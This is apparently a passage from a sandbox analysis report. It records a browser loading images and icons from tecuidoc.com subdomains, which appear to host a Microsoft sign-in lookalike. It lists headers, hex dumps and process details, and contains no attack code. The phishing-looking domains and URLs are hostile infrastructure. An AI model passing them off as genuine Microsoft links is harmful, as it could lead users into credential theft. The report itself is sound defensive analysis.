                                              Referer: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:40 UTC615INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:40 GMT
                                              Content-Type: image/x-icon
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public,max-age=31536000
                                              last-modified: Tue, 23 Apr 2024 14:29:38 GMT
                                              accept-ranges: bytes
                                              etag: "075baab8a95da1:0"
                                              p3p: CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAM BUS DEM NAV STA UNI COM INT PHY ONL FIN PRE PUR
                                              amserver: EUSXXXXGN00000G
                                              x-cache: CONFIG_NOCACHE
                                              x-msedge-ref: Ref A: E8488B9CDAAF4C069A19215EE3DFCF1C Ref B: DFW30EDGE0319 Ref C: 2024-04-26T14:57:39Z
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:40 UTC2286INData Raw: 38 65 37 0d 0a 00 00 01 00 06 00 10 10 00 00 00 00 20 00 16 01 00 00 66 00 00 00 18 18 00 00 00 00 20 00 24 01 00 00 7c 01 00 00 20 20 00 00 00 00 20 00 35 01 00 00 a0 02 00 00 30 30 00 00 00 00 20 00 6a 01 00 00 d5 03 00 00 40 40 00 00 00 00 20 00 f3 01 00 00 3f 05 00 00 80 80 00 00 00 00 20 00 b5 01 00 00 32 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 dd 49 44 41 54 78 9c dd 92 31 4e 43 41 10 43 df cc 8e 44 40 b0 22 2d 65 6e c4 21 90 68 c3 15 38 40 ce c4 39 68 a8 11 22 e4 ff 00 05 93 35 4d 1a b2 bf 89 68 10 2e 2d 8d c7 b6 6c 9b eb 85 4c fc 80 50 d6 59 09 5e 6c 75 77 ff c8 95 d9 72 dc 28 cd 08 0e e0 87 c7 c7 c2 7f 77 fe 17 04 42 28 7b da 12 04 f2 26 01 46 02 a9 89 be a2 ce 4e ba 66
                                              Data Ascii: 8e7 f $| 500 j@@ ? 2PNGIHDRaIDATx1NCACD@"-en!h8@9h"5Mh.-lLPY^luwr(wB({&FNf
                                              2024-04-26 14:57:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              59192.168.2.649782198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:38 UTC1293OUTGET /Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg HTTP/1.1
                                              Host: signup.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Purpose: prefetch
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:40 UTC641INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:40 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: public,max-age=31536000
                                              last-modified: Tue, 23 Apr 2024 14:29:38 GMT
                                              accept-ranges: bytes
                                              etag: "075baab8a95da1:0"
                                              p3p: CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAM BUS DEM NAV STA UNI COM INT PHY ONL FIN PRE PUR
                                              amserver: wusXXXXig00000E
                                              x-cache: CONFIG_NOCACHE
                                              x-msedge-ref: Ref A: 1E898F9DDED143D7AFC4CDF4EF150D79 Ref B: DFW311000107047 Ref C: 2024-04-26T14:57:40Z
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:40 UTC1871INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                              Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                              2024-04-26 14:57:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              60192.168.2.649785198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:38 UTC509OUTGET /images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:41 UTC736INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:40 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465614
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C00FF3F62A
                                              last-modified: Sun, 21 Apr 2024 05:01:10 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 3c7acae4-d01e-00e6-1aad-93b55d000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:41 UTC680INData Raw: 32 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 ff b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01
                                              Data Ascii: 2a1Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9
                                              2024-04-26 14:57:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              61192.168.2.649784198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:38 UTC495OUTGET /images/favicon.ico?v=2 HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:41 UTC671INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:41 GMT
                                              Content-Type: image/x-icon
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465310
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C017611702
                                              last-modified: Sun, 21 Apr 2024 05:01:23 GMT
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 0ad754d0-601e-00d9-2dae-931d53000000
                                              x-ms-version: 2009-09-19
                                              2024-04-26 14:57:41 UTC2286INData Raw: 38 65 37 0d 0a 00 00 01 00 06 00 10 10 00 00 00 00 20 00 16 01 00 00 66 00 00 00 18 18 00 00 00 00 20 00 24 01 00 00 7c 01 00 00 20 20 00 00 00 00 20 00 35 01 00 00 a0 02 00 00 30 30 00 00 00 00 20 00 6a 01 00 00 d5 03 00 00 40 40 00 00 00 00 20 00 f3 01 00 00 3f 05 00 00 80 80 00 00 00 00 20 00 b5 01 00 00 32 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 dd 49 44 41 54 78 9c dd 92 31 4e 43 41 10 43 df cc 8e 44 40 b0 22 2d 65 6e c4 21 90 68 c3 15 38 40 ce c4 39 68 a8 11 22 e4 ff 00 05 93 35 4d 1a b2 bf 89 68 10 2e 2d 8d c7 b6 6c 9b eb 85 4c fc 80 50 d6 59 09 5e 6c 75 77 ff c8 95 d9 72 dc 28 cd 08 0e e0 87 c7 c7 c2 7f 77 fe 17 04 42 28 7b da 12 04 f2 26 01 46 02 a9 89 be a2 ce 4e ba 66
                                              Data Ascii: 8e7 f $| 500 j@@ ? 2PNGIHDRaIDATx1NCACD@"-en!h8@9h"5Mh.-lLPY^luwr(wB({&FNf
                                              2024-04-26 14:57:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              62192.168.2.649788198.58.99.33443
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:42 UTC671OUTGET /Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg HTTP/1.1
                                              Host: signup.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; MicrosoftApplicationsTelemetryDeviceId=d8d04075-72f5-47cf-9961-5bd37d3461b4; clrc={%2219840%22%3a[%22d7PFy/1V%22%2c%22+VC+x0R6%22%2c%22FutSZdvn%22]}
                                              2024-04-26 14:57:44 UTC665INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:44 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public,max-age=31536000
                                              last-modified: Tue, 23 Apr 2024 14:29:38 GMT
                                              accept-ranges: bytes
                                              etag: "075baab8a95da1:0"
                                              vary: Accept-Encoding
                                              p3p: CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAM BUS DEM NAV STA UNI COM INT PHY ONL FIN PRE PUR
                                              amserver: EUSXXXXGN00000G
                                              x-cache: CONFIG_NOCACHE
                                              x-msedge-ref: Ref A: 872CAC643E1D41C3A7C7C15106B43158 Ref B: DFW311000102047 Ref C: 2024-04-26T14:57:44Z
                                              content-encoding: gzip
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:44 UTC1442INData Raw: 35 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12
                                              Data Ascii: 59bWMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#
                                              2024-04-26 14:57:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              63192.168.2.649787198.58.99.33443
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:42 UTC640OUTGET /Resources/images/favicon.ico HTTP/1.1
                                              Host: signup.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; MicrosoftApplicationsTelemetryDeviceId=d8d04075-72f5-47cf-9961-5bd37d3461b4; clrc={%2219840%22%3a[%22d7PFy/1V%22%2c%22+VC+x0R6%22%2c%22FutSZdvn%22]}
                                              2024-04-26 14:57:44 UTC615INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:44 GMT
                                              Content-Type: image/x-icon
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public,max-age=31536000
                                              last-modified: Tue, 23 Apr 2024 14:29:38 GMT
                                              accept-ranges: bytes
                                              etag: "075baab8a95da1:0"
                                              p3p: CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAM BUS DEM NAV STA UNI COM INT PHY ONL FIN PRE PUR
                                              amserver: eusXXXXgn0000N3
                                              x-cache: CONFIG_NOCACHE
                                              x-msedge-ref: Ref A: EA1D419C44CE498CA3F6C6A3259F85D4 Ref B: DFW30EDGE0310 Ref C: 2024-04-26T14:57:44Z
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:44 UTC2286INData Raw: 38 65 37 0d 0a 00 00 01 00 06 00 10 10 00 00 00 00 20 00 16 01 00 00 66 00 00 00 18 18 00 00 00 00 20 00 24 01 00 00 7c 01 00 00 20 20 00 00 00 00 20 00 35 01 00 00 a0 02 00 00 30 30 00 00 00 00 20 00 6a 01 00 00 d5 03 00 00 40 40 00 00 00 00 20 00 f3 01 00 00 3f 05 00 00 80 80 00 00 00 00 20 00 b5 01 00 00 32 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 dd 49 44 41 54 78 9c dd 92 31 4e 43 41 10 43 df cc 8e 44 40 b0 22 2d 65 6e c4 21 90 68 c3 15 38 40 ce c4 39 68 a8 11 22 e4 ff 00 05 93 35 4d 1a b2 bf 89 68 10 2e 2d 8d c7 b6 6c 9b eb 85 4c fc 80 50 d6 59 09 5e 6c 75 77 ff c8 95 d9 72 dc 28 cd 08 0e e0 87 c7 c7 c2 7f 77 fe 17 04 42 28 7b da 12 04 f2 26 01 46 02 a9 89 be a2 ce 4e ba 66
                                              Data Ascii: 8e7 f $| 500 j@@ ? 2PNGIHDRaIDATx1NCACD@"-en!h8@9h"5Mh.-lLPY^luwr(wB({&FNf
                                              2024-04-26 14:57:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              64192.168.2.649786198.58.99.33443
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:42 UTC658OUTGET /Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg HTTP/1.1
                                              Host: signup.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; MicrosoftApplicationsTelemetryDeviceId=d8d04075-72f5-47cf-9961-5bd37d3461b4; clrc={%2219840%22%3a[%22d7PFy/1V%22%2c%22+VC+x0R6%22%2c%22FutSZdvn%22]}
                                              2024-04-26 14:57:44 UTC641INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:44 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: public,max-age=31536000
                                              last-modified: Tue, 23 Apr 2024 14:29:38 GMT
                                              accept-ranges: bytes
                                              etag: "075baab8a95da1:0"
                                              p3p: CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAM BUS DEM NAV STA UNI COM INT PHY ONL FIN PRE PUR
                                              amserver: eusXXXXgn0000MP
                                              x-cache: CONFIG_NOCACHE
                                              x-msedge-ref: Ref A: B1494BABB85441B58D63A6501CBD995F Ref B: DFW311000108023 Ref C: 2024-04-26T14:57:44Z
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:44 UTC1871INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                              Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                              2024-04-26 14:57:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Click to jump to process

                                              Click to jump to process

                                              Click to jump to process

                                              Target ID:0
                                              Start time:16:56:05
                                              Start date:26/04/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                              Imagebase:0x7ff684c40000
                                              File size:3'242'272 bytes
                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Target ID:2
                                              Start time:16:56:11
                                              Start date:26/04/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2212,i,6787345325031674847,628112371274147507,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                              Imagebase:0x7ff684c40000
                                              File size:3'242'272 bytes
                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Target ID:3
                                              Start time:16:56:13
                                              Start date:26/04/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://srmcorp.tecuidoc.com/?PSZlk=ViP"
                                              Imagebase:0x7ff684c40000
                                              File size:3'242'272 bytes
                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              No disassembly